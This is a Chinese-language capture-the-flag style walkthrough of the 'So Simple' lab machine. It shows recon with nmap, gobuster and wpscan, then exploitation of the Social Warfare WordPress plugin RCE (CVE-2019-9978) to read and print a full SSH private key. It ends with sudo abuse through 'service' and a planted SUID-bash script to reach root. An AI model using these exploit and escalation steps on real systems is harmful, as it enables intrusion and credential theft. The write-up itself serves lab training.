主要知识点
- wordpress 插件RCE漏洞
- sudo -l + shell劫持
具体步骤
依旧是nmap 起手,只发现了22和80端口,但80端口只能看到一张图
Nmap scan report for 192.168.214.78
Host is up (0.46s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
| 256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_ 256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
针对80端口进行路径爆破发现有一个WordPress路径
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.214.78
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 502,404,429,503,400
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.214.78/wordpress/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================
于是我们使用wpscan进行扫描,我这边挂了代理,并且我希望使用更有侵略性的插件扫描,所以命令如下
wpscan --api-token xxxxxx--proxy socks5://127.0.0.1:7890 -e --plugins-detection aggressive --url http://192.168.214.78/wordpress
......
......
[+] social-warfare
| Location: http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2024-09-17T20:18:00.000Z
| Readme: http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/readme.txt
| [!] The version is out of date, the latest version is 4.5.4
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.214.78/wordpress/wp-content/plugins/social-warfare/, status: 200
|
| [!] 7 vulnerabilities identified:
|
|......
|......
|......
|
| [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)
| Fixed in: 3.5.3
| References:
| - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
| - https://www.webarxsecurity.com/social-warfare-vulnerability/
发现了social warefare版本有RCE漏洞,所以查询一下,得到了好多个poc,不过下面这个比较好用GitHub - grimlockx/CVE-2019-9978: Remote Code Execution in Social Warfare Plugin before 3.5.3 for Wordpress.
C:\home\kali\Documents\OFFSEC\play\SoSimple\CVE-2019-9978-main> python CVE-2019-9978.py -t http://192.168.214.78/wordpress -l 192.168.45.241 -p 80 -c "id"
[+] Started HTTP server on port 80
[+] Payload created successfully
[+] Target seems vulnerable
[+] Exploiting...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
按照同样的套路,我们发现了/home/max目录中的.ssh路径下有key文件,所以复制下来尝试ssh登录
C:\home\kali\Documents\OFFSEC\play\SoSimple\CVE-2019-9978-main> python CVE-2019-9978.py -t http://192.168.214.78/wordpress -l 192.168.45.241 -p 80 -c "cat /home/max/.ssh/id_rsa"
[+] Started HTTP server on port 80
[+] Payload created successfully
[+] Target seems vulnerable
[+] Exploiting...
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
将上面的key文件写入到本地的id_rsa中,并赋予600权限,并尝试ssh登录成功
C:\home\kali\Documents\OFFSEC\play\SoSimple> chmod 600 id_rsa
C:\home\kali\Documents\OFFSEC\play\SoSimple> ssh max@192.168.214.78 -i id_rsa
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
......
......
max@so-simple:~$ whoami
max
先执行sudo -l 发现可以以steven的身份执行 /usr/sbin/service
max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
参考GTFObins的方法,可以转变为steven用户
max@so-simple:~$ sudo -u steven /usr/sbin/service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
继续以steven的用户身份进行sudo -l,发现可以以root用户身份执行/opt/tools/server-health.sh
steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh
但其实并无该文件,所以我们尝试创建一个,其内容为赋予/bin/bash SUID,再以Root身份执行,提权成功
steven@so-simple:/$ cat /opt/tools/server-health.sh
cat: /opt/tools/server-health.sh: No such file or directory
steven@so-simple:/$ ls -l /opt/tools
ls: cannot access '/opt/tools': No such file or directory
steven@so-simple:/$ ls -l /opt
total 0
steven@so-simple:/$ mkdir /opt/tools
steven@so-simple:/$ cd /opt/tools
steven@so-simple:/opt/tools$
steven@so-simple:/opt/tools$ echo "chmod +s /bin/bash" > server-health.sh
steven@so-simple:/opt/tools$ chmod +x server-health.sh
steven@so-simple:/opt/tools$ sudo -u root /opt/tools/server-health.sh
steven@so-simple:/opt/tools$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Feb 25 2020 /bin/bash
steven@so-simple:/opt/tools$ /bin/bash -p
bash-5.0# cat /root/proof.txt
5d53bb7f654bb7d09e8fbfa50a392267
bash-5.0#